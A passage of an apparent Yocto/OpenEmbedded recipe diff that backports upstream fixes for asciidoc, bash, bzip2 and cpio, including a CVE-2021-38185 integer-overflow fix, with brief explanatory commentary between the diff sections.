# The scripts reference config.h so add it to the top ptest dir.
cp ${B}/config.h ${D}${PTEST_PATH}
install -D ${WORKDIR}/remove-for-aarch64 ${D}${PTEST_PATH}
+ install -D ${WORKDIR}/remove-for-all ${D}${PTEST_PATH}
# Add an executable need by none/tests/bigcode
mkdir ${D}${PTEST_PATH}/perf
diff --git a/meta/recipes-devtools/xmlto/xmlto_0.0.28.bb b/meta/recipes-devtools/xmlto/xmlto_0.0.28.bb
index 7d27c43c83..d988e1ffce 100644
--- a/meta/recipes-devtools/xmlto/xmlto_0.0.28.bb
+++ b/meta/recipes-devtools/xmlto/xmlto_0.0.28.bb
@@ -1,5 +1,6 @@
SUMMARY = "A shell-script tool for converting XML files to various formats"
-HOMEPAGE = "https://releases.pagure.org/xmlto/"
+HOMEPAGE = "https://pagure.io/xmlto"
+DESCRIPTION = "Utility xmlto is a simple shell-script tool for converting XML files to various formats. It serves as easy to use command line frontend to make fine output without remembering many long options and searching for the syntax of the backends."
SECTION = "docs/xmlto"
LICENSE = "GPLv2"
@@ -29,7 +30,7 @@ RDEPENDS_${PN}_append_class-target = " \
libxslt-bin \
coreutils \
"
-CACHED_CONFIGUREVARS += "ac_cv_path_TAIL=tail"
+CACHED_CONFIGUREVARS += "ac_cv_path_TAIL=tail ac_cv_path_GREP=grep"
BBCLASSEXTEND = "native"
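
The added ac_cv_path_GREP=grep mirrors the existing ac_cv_path_TAIL=tail: these are the cache variables configure consults when it searches for those programs, so pre-seeding them leaves plain "grep"/"tail" in the generated script rather than absolute paths from the build host. The same effect can be had outside BitBake by passing the variables directly on the configure command line (a sketch, not the recipe's actual invocation):

./configure ac_cv_path_TAIL=tail ac_cv_path_GREP=grep
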
diff --git a/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch b/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch
new file mode 100644
index 0000000000..14c1cd806e
--- /dev/null
+++ b/meta/recipes-extended/asciidoc/asciidoc/detect-python-version.patch
@@ -0,0 +1,42 @@
+From 44d2d6095246124c024230f89c1029794491839f Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Miro=20Hron=C4=8Dok?= <miro@hroncok.cz>
+Date: Fri, 30 Oct 2020 15:10:35 +0100
+Subject: [PATCH] Properly detect and compare Python version 3.10+ (#151)
+
+Upstream commit: https://github.com/asciidoc-py/asciidoc-py/commit/44d2d6095246124c024230f89c1029794491839f
+
+Slightly modified to cleanly apply to asciidoc 8.6.9:
+- VERSION and MIN_PYTHON_VERSION changed to reflect values in 8.6.9
+- line numbers corrected to eliminate offset warnings
+
+Upstream-Status: Backport
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ asciidoc.py | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/asciidoc.py b/asciidoc.py
+index f960e7d8..42868c4b 100755
+--- a/asciidoc.py
++++ b/asciidoc.py
+@@ -30,7 +30,7 @@
+ # Used by asciidocapi.py #
+ VERSION = '8.6.10' # See CHANGELOG file for version history.
+
+-MIN_PYTHON_VERSION = '3.4' # Require this version of Python or better.
++MIN_PYTHON_VERSION = (3, 4) # Require this version of Python or better.
+
+ # ---------------------------------------------------------------------------
+ # Program constants.
+@@ -4704,8 +4704,8 @@ def init(self, cmd):
+ directory.
+ cmd is the asciidoc command or asciidoc.py path.
+ """
+- if float(sys.version[:3]) < float(MIN_PYTHON_VERSION):
+- message.stderr('FAILED: Python %s or better required' % MIN_PYTHON_VERSION)
++ if sys.version_info[:2] < MIN_PYTHON_VERSION:
++ message.stderr('FAILED: Python %d.%d or better required' % MIN_PYTHON_VERSION)
+ sys.exit(1)
+ if not os.path.exists(cmd):
+ message.stderr('FAILED: Missing asciidoc command: %s' % cmd)
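
The backport replaces a string/float comparison of the interpreter version with a tuple comparison. Why the old check misclassifies Python 3.10 can be seen with a couple of one-liners (assuming a python3 on PATH; the version string is illustrative):

# sys.version for Python 3.10.x begins with "3.10", so its first three characters are "3.1"
python3 -c 'print(float("3.10.4 (main)"[:3]))'                   # 3.1
python3 -c 'print(float("3.10.4 (main)"[:3]) < float("3.4"))'    # True -> wrongly reported as too old
# the fixed code compares version tuples instead, which orders 3.10 after 3.4
python3 -c 'import sys; print(sys.version_info[:2] >= (3, 4))'
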
diff --git a/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb b/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb
index 751bf0f19f..325ff9aa15 100644
--- a/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb
+++ b/meta/recipes-extended/asciidoc/asciidoc_8.6.9.bb
@@ -8,8 +8,9 @@ LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=8ca43cbc842c2336e835926c2166c28b \
file://COPYRIGHT;md5=029ad5428ba5efa20176b396222d4069"
-SRC_URI = "git://github.com/asciidoc/asciidoc-py3;protocol=https \
- file://auto-catalogs.patch"
+SRC_URI = "git://github.com/asciidoc/asciidoc-py;protocol=https;branch=main \
+ file://auto-catalogs.patch \
+ file://detect-python-version.patch"
SRCREV = "618f6e6f6b558ed1e5f2588cd60a5a6b4f881ca0"
PV .= "+py3-git${SRCPV}"
diff --git a/meta/recipes-extended/bash/bash.inc b/meta/recipes-extended/bash/bash.inc
index 1ebb33bdcd..4e6176d2e6 100644
--- a/meta/recipes-extended/bash/bash.inc
+++ b/meta/recipes-extended/bash/bash.inc
@@ -1,5 +1,6 @@
SUMMARY = "An sh-compatible command language interpreter"
HOMEPAGE = "http://tiswww.case.edu/php/chet/bash/bashtop.html"
+DESCRIPTION = "Bash is the GNU Project's Bourne Again SHell, a complete implementation of the IEEE POSIX and Open Group shell specification with interactive command line editing, job control on architectures that support it, csh-like features such as history substitution and brace expansion, and a slew of other features."
SECTION = "base/shell"
DEPENDS = "ncurses bison-native virtual/libiconv"
@@ -48,6 +49,11 @@ do_compile_ptest () {
oe_runmake buildtest
}
+do_install_prepend () {
+ # Ensure determinism as this counter increases for each make call
+ rm -f ${B}/.build
+}
+
do_install_append () {
# Move /usr/bin/bash to /bin/bash, if need
if [ "${base_bindir}" != "${bindir}" ]; then
diff --git a/meta/recipes-extended/bash/bash/bash-CVE-2019-18276.patch b/meta/recipes-extended/bash/bash/CVE-2019-18276.patch
index 7b2073201e..7b2073201e 100644
--- a/meta/recipes-extended/bash/bash/bash-CVE-2019-18276.patch
+++ b/meta/recipes-extended/bash/bash/CVE-2019-18276.patch
diff --git a/meta/recipes-extended/bash/bash_5.0.bb b/meta/recipes-extended/bash/bash_5.0.bb
index 257a03bd8b..53e05869ce 100644
--- a/meta/recipes-extended/bash/bash_5.0.bb
+++ b/meta/recipes-extended/bash/bash_5.0.bb
@@ -30,7 +30,7 @@ SRC_URI = "${GNU_MIRROR}/bash/${BP}.tar.gz;name=tarball \
file://run-ptest \
file://run-bash-ptests \
file://fix-run-builtins.patch \
- file://bash-CVE-2019-18276.patch \
+ file://CVE-2019-18276.patch \
"
SRC_URI[tarball.md5sum] = "2b44b47b905be16f45709648f671820b"
diff --git a/meta/recipes-extended/bc/bc_1.07.1.bb b/meta/recipes-extended/bc/bc_1.07.1.bb
index 4a51302492..8ed10d14c2 100644
--- a/meta/recipes-extended/bc/bc_1.07.1.bb
+++ b/meta/recipes-extended/bc/bc_1.07.1.bb
@@ -1,5 +1,6 @@
SUMMARY = "Arbitrary precision calculator language"
HOMEPAGE = "http://www.gnu.org/software/bc/bc.html"
+DESCRIPTION = "bc is an arbitrary precision numeric processing language. Syntax is similar to C, but differs in many substantial areas. It supports interactive execution of statements."
LICENSE = "GPLv3+"
LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \
@@ -31,4 +32,4 @@ do_compile_prepend() {
ALTERNATIVE_${PN} = "bc dc"
ALTERNATIVE_PRIORITY = "100"
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-extended/bzip2/bzip2/Makefile.am b/meta/recipes-extended/bzip2/bzip2/Makefile.am
index dcf64584d9..adc85a62b2 100644
--- a/meta/recipes-extended/bzip2/bzip2/Makefile.am
+++ b/meta/recipes-extended/bzip2/bzip2/Makefile.am
@@ -1,6 +1,6 @@
lib_LTLIBRARIES = libbz2.la
-libbz2_la_LDFLAGS = -version-info 1:6:0
+libbz2_la_LDFLAGS = -version-info 1:8:0
libbz2_la_SOURCES = blocksort.c \
huffman.c \
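
For context on the -version-info bump: libtool reads the triple as current:revision:age and, on Linux, names the library lib<name>.so.(current-age).(age).(revision), so 1:6:0 produced libbz2.so.1.0.6 while 1:8:0 produces libbz2.so.1.0.8, presumably to match the 1.0.8 sources this autotools glue is applied to. A tiny sketch of the mapping (the helper function is purely illustrative):

ltver() { c=$1; r=$2; a=$3; echo "libbz2.so.$((c - a)).$a.$r"; }
ltver 1 6 0   # libbz2.so.1.0.6
ltver 1 8 0   # libbz2.so.1.0.8
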
diff --git a/meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch b/meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch
new file mode 100644
index 0000000000..2dfd348d7c
--- /dev/null
+++ b/meta/recipes-extended/cpio/cpio-2.13/0003-Fix-calculation-of-CRC-in-copy-out-mode.patch
@@ -0,0 +1,58 @@
+From d257e47a6c6b41ba727b196ac96c05ab91bd9d65 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Fri, 7 Apr 2023 11:23:37 +0300
+Subject: [PATCH 3/4] Fix calculation of CRC in copy-out mode.
+
+* src/copyout.c (read_for_checksum): Fix type of the file_size argument.
+Rewrite the reading loop.
+
+Original patch by Stefano Babic <sbabic@denx.de>
+
+Upstream-Status: Backport [a1b2f7871c3ae5113e0102b870b15ea06a8f0e3d]
+Signed-off-by: Marek Vasut <marex@denx.de>
+---
+ src/copyout.c | 16 +++++++---------
+ 1 file changed, 7 insertions(+), 9 deletions(-)
+
+diff --git a/src/copyout.c b/src/copyout.c
+index 8b0beb6..f1ff351 100644
+--- a/src/copyout.c
++++ b/src/copyout.c
+@@ -34,27 +34,25 @@
+ compute and return a checksum for them. */
+
+ static uint32_t
+-read_for_checksum (int in_file_des, int file_size, char *file_name)
++read_for_checksum (int in_file_des, off_t file_size, char *file_name)
+ {
+ uint32_t crc;
+- char buf[BUFSIZ];
+- int bytes_left;
+- int bytes_read;
+- int i;
++ unsigned char buf[BUFSIZ];
++ ssize_t bytes_read;
++ ssize_t i;
+
+ crc = 0;
+
+- for (bytes_left = file_size; bytes_left > 0; bytes_left -= bytes_read)
++ while (file_size > 0)
+ {
+ bytes_read = read (in_file_des, buf, BUFSIZ);
+ if (bytes_read < 0)
+ error (PAXEXIT_FAILURE, errno, _("cannot read checksum for %s"), file_name);
+ if (bytes_read == 0)
+ break;
+- if (bytes_left < bytes_read)
+- bytes_read = bytes_left;
+- for (i = 0; i < bytes_read; ++i)
++ for (i = 0; i < bytes_read; i++)
+ crc += buf[i] & 0xff;
++ file_size -= bytes_read;
+ }
+ if (lseek (in_file_des, 0L, SEEK_SET))
+ error (PAXEXIT_FAILURE, errno, _("cannot read checksum for %s"), file_name);
+--
+2.39.2
+
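
The backport above widens read_for_checksum()'s file_size parameter from int to off_t and reworks the loop so it no longer keeps a separate bytes_left counter. The failure mode: a size of 2 GiB or more no longer fits in a 32-bit signed int and will typically wrap to a negative value, so the old "bytes_left > 0" loop computes the checksum over the wrong number of bytes (none at all once the value goes negative). A rough shell illustration of the wrap-around (assumes 64-bit shell arithmetic):

size=$((3 * 1024 * 1024 * 1024))                 # 3 GiB, fine as an off_t
low32=$(( size & 0xFFFFFFFF ))
[ "$low32" -gt 2147483647 ] && low32=$(( low32 - 4294967296 ))
echo "as off_t: $size  as 32-bit int: $low32"    # the int value is negative
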
diff --git a/meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch b/meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch
new file mode 100644
index 0000000000..c212bddf7d
--- /dev/null
+++ b/meta/recipes-extended/cpio/cpio-2.13/0004-Fix-appending-to-archives-bigger-than-2G.patch
@@ -0,0 +1,312 @@
+From 8513495ab5cfb63eb7c4c933fdf0b78c6196cd27 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Fri, 28 Apr 2023 15:23:46 +0300
+Subject: [PATCH 4/4] Fix appending to archives bigger than 2G
+
+* src/extern.h (last_header_start): Change type to off_t.
+* src/global.c: Likewise.
+* src/util.c (prepare_append): Use off_t for file offsets.
+
+Upstream-Status: Backport [0987d63384f0419b4b14aecdc6a61729b75ce86a]
+Signed-off-by: Marek Vasut <marex@denx.de>
+---
+ src/extern.h | 11 ++++-----
+ src/global.c | 2 +-
+ src/util.c | 66 ++++++++++++++++++++++++++--------------------------
+ 3 files changed, 39 insertions(+), 40 deletions(-)
+
+diff --git a/src/extern.h b/src/extern.h
+index 11ac6bf..12f14a9 100644
+--- a/src/extern.h
++++ b/src/extern.h
+@@ -67,7 +67,7 @@ extern int ignore_devno_option;
+
+ extern bool to_stdout_option;
+
+-extern int last_header_start;
++extern off_t last_header_start;
+ extern int copy_matching_files;
+ extern int numeric_uid;
+ extern char *pattern_file_name;
+@@ -123,7 +123,7 @@ void field_width_error (const char *filename, const char *fieldname,
+
+ /* copypass.c */
+ void process_copy_pass (void);
+-int link_to_maj_min_ino (char *file_name, int st_dev_maj,
++int link_to_maj_min_ino (char *file_name, int st_dev_maj,
+ int st_dev_min, ino_t st_ino);
+ int link_to_name (char const *link_name, char const *link_target);
+
+@@ -171,7 +171,7 @@ void copy_files_tape_to_disk (int in_des, int out_des, off_t num_bytes);
+ void copy_files_disk_to_tape (int in_des, int out_des, off_t num_bytes, char *filename);
+ void copy_files_disk_to_disk (int in_des, int out_des, off_t num_bytes, char *filename);
+ void warn_if_file_changed (char *file_name, off_t old_file_size,
+- time_t old_file_mtime);
++ time_t old_file_mtime);
+ void create_all_directories (char const *name);
+ void prepare_append (int out_file_des);
+ char *find_inode_file (ino_t node_num,
+@@ -185,7 +185,7 @@ void set_new_media_message (char *message);
+ #ifdef HPUX_CDF
+ char *add_cdf_double_slashes (char *filename);
+ #endif
+-void write_nuls_to_file (off_t num_bytes, int out_des,
++void write_nuls_to_file (off_t num_bytes, int out_des,
+ void (*writer) (char *in_buf,
+ int out_des, off_t num_bytes));
+ #define DISK_IO_BLOCK_SIZE 512
+@@ -229,6 +229,5 @@ void delay_set_stat (char const *file_name, struct stat *st,
+ mode_t invert_permissions);
+ int repair_delayed_set_stat (struct cpio_file_stat *file_hdr);
+ void apply_delayed_set_stat (void);
+-
+-int arf_stores_inode_p (enum archive_format arf);
+
++int arf_stores_inode_p (enum archive_format arf);
+diff --git a/src/global.c b/src/global.c
+index fb3abe9..5c9fc05 100644
+--- a/src/global.c
++++ b/src/global.c
+@@ -114,7 +114,7 @@ int debug_flag = false;
+
+ /* File position of last header read. Only used during -A to determine
+ where the old TRAILER!!! record started. */
+-int last_header_start = 0;
++off_t last_header_start = 0;
+
+ /* With -i; if true, copy only files that match any of the given patterns;
+ if false, copy only files that do not match any of the patterns. (-f) */
+diff --git a/src/util.c b/src/util.c
+index 4421b20..3be89a4 100644
+--- a/src/util.c
++++ b/src/util.c
+@@ -60,8 +60,8 @@ tape_empty_output_buffer (int out_des)
+ static long output_bytes_before_lseek = 0;
+
+ /* Some tape drivers seem to have a signed internal seek pointer and
+- they lose if it overflows and becomes negative (e.g. when writing
+- tapes > 2Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
++ they lose if it overflows and becomes negative (e.g. when writing
++ tapes > 2Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
+ seek pointer and prevent it from overflowing. */
+ if (output_is_special
+ && ( (output_bytes_before_lseek += output_size) >= 1073741824L) )
+@@ -106,7 +106,7 @@ static ssize_t sparse_write (int fildes, char *buf, size_t nbyte, bool flush);
+ descriptor OUT_DES and reset `output_size' and `out_buff'.
+ If `swapping_halfwords' or `swapping_bytes' is set,
+ do the appropriate swapping first. Our callers have
+- to make sure to only set these flags if `output_size'
++ to make sure to only set these flags if `output_size'
+ is appropriate (a multiple of 4 for `swapping_halfwords',
+ 2 for `swapping_bytes'). The fact that DISK_IO_BLOCK_SIZE
+ must always be a multiple of 4 helps us (and our callers)
+@@ -188,8 +188,8 @@ tape_fill_input_buffer (int in_des, int num_bytes)
+ {
+ #ifdef BROKEN_LONG_TAPE_DRIVER
+ /* Some tape drivers seem to have a signed internal seek pointer and
+- they lose if it overflows and becomes negative (e.g. when writing
+- tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
++ they lose if it overflows and becomes negative (e.g. when writing
++ tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
+ seek pointer and prevent it from overflowing. */
+ if (input_is_special
+ && ( (input_bytes_before_lseek += num_bytes) >= 1073741824L) )
+@@ -332,8 +332,8 @@ tape_buffered_peek (char *peek_buf, int in_des, int num_bytes)
+
+ #ifdef BROKEN_LONG_TAPE_DRIVER
+ /* Some tape drivers seem to have a signed internal seek pointer and
+- they lose if it overflows and becomes negative (e.g. when writing
+- tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
++ they lose if it overflows and becomes negative (e.g. when writing
++ tapes > 4Gb). Doing an lseek (des, 0, SEEK_SET) seems to reset the
+ seek pointer and prevent it from overflowing. */
+ if (input_is_special
+ && ( (input_bytes_before_lseek += num_bytes) >= 1073741824L) )
+@@ -404,7 +404,7 @@ tape_toss_input (int in_des, off_t num_bytes)
+
+ if (crc_i_flag && only_verify_crc_flag)
+ {
+- int k;
++ int k;
+ for (k = 0; k < space_left; ++k)
+ crc += in_buff[k] & 0xff;
+ }
+@@ -416,14 +416,14 @@ tape_toss_input (int in_des, off_t num_bytes)
+ }
+
+ void
+-write_nuls_to_file (off_t num_bytes, int out_des,
+- void (*writer) (char *in_buf, int out_des, off_t num_bytes))
++write_nuls_to_file (off_t num_bytes, int out_des,
++ void (*writer) (char *in_buf, int out_des, off_t num_bytes))
+ {
+ off_t blocks;
+ off_t extra_bytes;
+ off_t i;
+ static char zeros_512[512];
+-
++
+ blocks = num_bytes / sizeof zeros_512;
+ extra_bytes = num_bytes % sizeof zeros_512;
+ for (i = 0; i < blocks; ++i)
+@@ -603,7 +603,7 @@ create_all_directories (char const *name)
+ char *dir;
+
+ dir = dir_name (name);
+-
++
+ if (dir == NULL)
+ error (PAXEXIT_FAILURE, 0, _("virtual memory exhausted"));
+
+@@ -637,9 +637,9 @@ create_all_directories (char const *name)
+ void
+ prepare_append (int out_file_des)
+ {
+- int start_of_header;
+- int start_of_block;
+- int useful_bytes_in_block;
++ off_t start_of_header;
++ off_t start_of_block;
++ size_t useful_bytes_in_block;
+ char *tmp_buf;
+
+ start_of_header = last_header_start;
+@@ -697,8 +697,8 @@ inode_val_compare (const void *val1, const void *val2)
+ const struct inode_val *ival1 = val1;
+ const struct inode_val *ival2 = val2;
+ return ival1->inode == ival2->inode
+- && ival1->major_num == ival2->major_num
+- && ival1->minor_num == ival2->minor_num;
++ && ival1->major_num == ival2->major_num
++ && ival1->minor_num == ival2->minor_num;
+ }
+
+ static struct inode_val *
+@@ -706,10 +706,10 @@ find_inode_val (ino_t node_num, unsigned long major_num,
+ unsigned long minor_num)
+ {
+ struct inode_val sample;
+-
++
+ if (!hash_table)
+ return NULL;
+-
++
+ sample.inode = node_num;
+ sample.major_num = major_num;
+ sample.minor_num = minor_num;
+@@ -734,7 +734,7 @@ add_inode (ino_t node_num, char *file_name, unsigned long major_num,
+ {
+ struct inode_val *temp;
+ struct inode_val *e = NULL;
+-
++
+ /* Create new inode record. */
+ temp = (struct inode_val *) xmalloc (sizeof (struct inode_val));
+ temp->inode = node_num;
+@@ -1007,7 +1007,7 @@ buf_all_zeros (char *buf, int bufsize)
+
+ /* Write NBYTE bytes from BUF to file descriptor FILDES, trying to
+ create holes instead of writing blockfuls of zeros.
+-
++
+ Return the number of bytes written (including bytes in zero
+ regions) on success, -1 on error.
+
+@@ -1027,7 +1027,7 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush)
+
+ enum { begin, in_zeros, not_in_zeros } state =
+ delayed_seek_count ? in_zeros : begin;
+-
++
+ while (nbytes)
+ {
+ size_t rest = nbytes;
+@@ -1042,7 +1042,7 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush)
+ if (state == not_in_zeros)
+ {
+ ssize_t bytes = buf - start_ptr + rest;
+-
++
+ n = write (fildes, start_ptr, bytes);
+ if (n == -1)
+ return -1;
+@@ -1091,8 +1091,8 @@ sparse_write (int fildes, char *buf, size_t nbytes, bool flush)
+ if (n != 1)
+ return n;
+ delayed_seek_count = 0;
+- }
+-
++ }
++
+ return nwritten + seek_count;
+ }
+
+@@ -1222,7 +1222,7 @@ set_perms (int fd, struct cpio_file_stat *header)
+ if (!no_chown_flag)
+ {
+ uid_t uid = CPIO_UID (header->c_uid);
+- gid_t gid = CPIO_GID (header->c_gid);
++ gid_t gid = CPIO_GID (header->c_gid);
+ if ((fchown_or_chown (fd, header->c_name, uid, gid) < 0)
+ && errno != EPERM)
+ chown_error_details (header->c_name, uid, gid);
+@@ -1239,13 +1239,13 @@ set_file_times (int fd,
+ const char *name, unsigned long atime, unsigned long mtime)
+ {
+ struct timespec ts[2];
+-
++
+ memset (&ts, 0, sizeof ts);
+
+ ts[0].tv_sec = atime;
+ ts[1].tv_sec = mtime;
+
+- /* Silently ignore EROFS because reading the file won't have upset its
++ /* Silently ignore EROFS because reading the file won't have upset its
+ timestamp if it's on a read-only filesystem. */
+ if (fdutimens (fd, name, ts) < 0 && errno != EROFS)
+ utime_error (name);
+@@ -1297,7 +1297,7 @@ cpio_safer_name_suffix (char *name, bool link_target, bool absolute_names,
+
+ /* This is a simplified form of delayed set_stat used by GNU tar.
+ With the time, both forms will merge and pass to paxutils
+-
++
+ List of directories whose statuses we need to extract after we've
+ finished extracting their subsidiary files. If you consider each
+ contiguous subsequence of elements of the form [D]?[^D]*, where [D]
+@@ -1415,7 +1415,7 @@ cpio_mkdir (struct cpio_file_stat *file_hdr, int *setstat_delayed)
+ {
+ int rc;
+ mode_t mode = file_hdr->c_mode;
+-
++
+ if (!(file_hdr->c_mode & S_IWUSR))
+ {
+ rc = mkdir (file_hdr->c_name, mode | S_IWUSR);
+@@ -1438,10 +1438,10 @@ cpio_create_dir (struct cpio_file_stat *file_hdr, int existing_dir)
+ {
+ int res; /* Result of various function calls. */
+ int setstat_delayed = 0;
+-
++
+ if (to_stdout_option)
+ return 0;
+-
++
+ /* Strip any trailing `/'s off the filename; tar puts
+ them on. We might as well do it here in case anybody
+ else does too, since they cause strange things to happen. */
+@@ -1530,7 +1530,7 @@ arf_stores_inode_p (enum archive_format arf)
+ }
+ return 1;
+ }
+-
++
+ void
+ cpio_file_stat_init (struct cpio_file_stat *file_hdr)
+ {
+--
+2.39.2
+
diff --git a/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch
new file mode 100644
index 0000000000..6ceafeee49
--- /dev/null
+++ b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch
@@ -0,0 +1,581 @@
+GNU cpio through 2.13 allows attackers to execute arbitrary code via a crafted
+pattern file, because of a dstring.c ds_fgetstr integer overflow that triggers
+an out-of-bounds heap write.
+
+CVE: CVE-2021-38185
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From e494c68a3a0951b1eaba77e2db93f71a890e15d8 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Sat, 7 Aug 2021 12:52:21 +0300
+Subject: [PATCH 1/3] Rewrite dynamic string support.
+
+* src/dstring.c (ds_init): Take a single argument.
+(ds_free): New function.
+(ds_resize): Take a single argument. Use x2nrealloc to expand
+the storage.
+(ds_reset,ds_append,ds_concat,ds_endswith): New function.
+(ds_fgetstr): Rewrite. In particular, this fixes integer overflow.
+* src/dstring.h (dynamic_string): Keep both the allocated length
+(ds_size) and index of the next free byte in the string (ds_idx).
+(ds_init,ds_resize): Change signature.
+(ds_len): New macro.
+(ds_free,ds_reset,ds_append,ds_concat,ds_endswith): New protos.
+* src/copyin.c: Use new ds_ functions.
+* src/copyout.c: Likewise.
+* src/copypass.c: Likewise.
+* src/util.c: Likewise.
+---
+ src/copyin.c | 40 +++++++++++------------
+ src/copyout.c | 16 ++++-----
+ src/copypass.c | 34 +++++++++----------
+ src/dstring.c | 88 ++++++++++++++++++++++++++++++++++++--------------
+ src/dstring.h | 31 +++++++++---------
+ src/util.c | 6 ++--
+ 6 files changed, 123 insertions(+), 92 deletions(-)
+
+diff --git a/src/copyin.c b/src/copyin.c
+index b29f348..37e503a 100644
+--- a/src/copyin.c
++++ b/src/copyin.c
+@@ -55,11 +55,12 @@ query_rename(struct cpio_file_stat* file_hdr, FILE *tty_in, FILE *tty_out,
+ char *str_res; /* Result for string function. */
+ static dynamic_string new_name; /* New file name for rename option. */
+ static int initialized_new_name = false;
++
+ if (!initialized_new_name)
+- {
+- ds_init (&new_name, 128);
+- initialized_new_name = true;
+- }
++ {
++ ds_init (&new_name);
++ initialized_new_name = true;
++ }
+
+ if (rename_flag)
+ {
+@@ -779,37 +780,36 @@ long_format (struct cpio_file_stat *file_hdr, char const *link_name)
+ already in `save_patterns' (from the command line) are preserved. */
+
+ static void
+-read_pattern_file ()
++read_pattern_file (void)
+ {
+- int max_new_patterns;
+- char **new_save_patterns;
+- int new_num_patterns;
++ char **new_save_patterns = NULL;
++ size_t max_new_patterns;
++ size_t new_num_patterns;
+ int i;
+- dynamic_string pattern_name;
++ dynamic_string pattern_name = DYNAMIC_STRING_INITIALIZER;
+ FILE *pattern_fp;
+
+ if (num_patterns < 0)
+ num_patterns = 0;
+- max_new_patterns = 1 + num_patterns;
+- new_save_patterns = (char **) xmalloc (max_new_patterns * sizeof (char *));
+ new_num_patterns = num_patterns;
+- ds_init (&pattern_name, 128);
++ max_new_patterns = num_patterns;
++ new_save_patterns = xcalloc (max_new_patterns, sizeof (new_save_patterns[0]));
+
+ pattern_fp = fopen (pattern_file_name, "r");
+ if (pattern_fp == NULL)
+ open_fatal (pattern_file_name);
+ while (ds_fgetstr (pattern_fp, &pattern_name, '\n') != NULL)
+ {
+- if (new_num_patterns >= max_new_patterns)
+- {
+- max_new_patterns += 1;
+- new_save_patterns = (char **)
+- xrealloc ((char *) new_save_patterns,
+- max_new_patterns * sizeof (char *));
+- }
++ if (new_num_patterns == max_new_patterns)
++ new_save_patterns = x2nrealloc (new_save_patterns,
++ &max_new_patterns,
++ sizeof (new_save_patterns[0]));
+ new_save_patterns[new_num_patterns] = xstrdup (pattern_name.ds_string);
+ ++new_num_patterns;
+ }
++
++ ds_free (&pattern_name);
++
+ if (ferror (pattern_fp) || fclose (pattern_fp) == EOF)
+ close_error (pattern_file_name);
+
+@@ -1196,7 +1196,7 @@ swab_array (char *ptr, int count)
+ in the file system. */
+
+ void
+-process_copy_in ()
++process_copy_in (void)
+ {
+ char done = false; /* True if trailer reached. */
+ FILE *tty_in = NULL; /* Interactive file for rename option. */
+diff --git a/src/copyout.c b/src/copyout.c
+index 8b0beb6..26e3dda 100644
+--- a/src/copyout.c
++++ b/src/copyout.c
+@@ -594,9 +594,10 @@ assign_string (char **pvar, char *value)
+ The format of the header depends on the compatibility (-c) flag. */
+
+ void
+-process_copy_out ()
++process_copy_out (void)
+ {
+- dynamic_string input_name; /* Name of file read from stdin. */
++ dynamic_string input_name = DYNAMIC_STRING_INITIALIZER;
++ /* Name of file read from stdin. */
+ struct stat file_stat; /* Stat record for file. */
+ struct cpio_file_stat file_hdr = CPIO_FILE_STAT_INITIALIZER;
+ /* Output header information. */
+@@ -605,7 +606,6 @@ process_copy_out ()
+ char *orig_file_name = NULL;
+
+ /* Initialize the copy out. */
+- ds_init (&input_name, 128);
+ file_hdr.c_magic = 070707;
+
+ /* Check whether the output file might be a tape. */
+@@ -657,14 +657,9 @@ process_copy_out ()
+ {
+ if (file_hdr.c_mode & CP_IFDIR)
+ {
+- int len = strlen (input_name.ds_string);
+ /* Make sure the name ends with a slash */
+- if (input_name.ds_string[len-1] != '/')
+- {
+- ds_resize (&input_name, len + 2);
+- input_name.ds_string[len] = '/';
+- input_name.ds_string[len+1] = 0;
+- }
++ if (!ds_endswith (&input_name, '/'))
++ ds_append (&input_name, '/');
+ }
+ }
+
+@@ -875,6 +870,7 @@ process_copy_out ()
+ (unsigned long) blocks), (unsigned long) blocks);
+ }
+ cpio_file_stat_free (&file_hdr);
++ ds_free (&input_name);
+ }
+
+
+diff --git a/src/copypass.c b/src/copypass.c
+index dc13b5b..62f31c6 100644
+--- a/src/copypass.c
++++ b/src/copypass.c
+@@ -48,10 +48,12 @@ set_copypass_perms (int fd, const char *name, struct stat *st)
+ If `link_flag', link instead of copying. */
+
+ void
+-process_copy_pass ()
++process_copy_pass (void)
+ {
+- dynamic_string input_name; /* Name of file from stdin. */
+- dynamic_string output_name; /* Name of new file. */
++ dynamic_string input_name = DYNAMIC_STRING_INITIALIZER;
++ /* Name of file from stdin. */
++ dynamic_string output_name = DYNAMIC_STRING_INITIALIZER;
++ /* Name of new file. */
+ size_t dirname_len; /* Length of `directory_name'. */
+ int res; /* Result of functions. */
+ char *slash; /* For moving past slashes in input name. */
+@@ -65,25 +67,18 @@ process_copy_pass ()
+ created files */
+
+ /* Initialize the copy pass. */
+- ds_init (&input_name, 128);
+
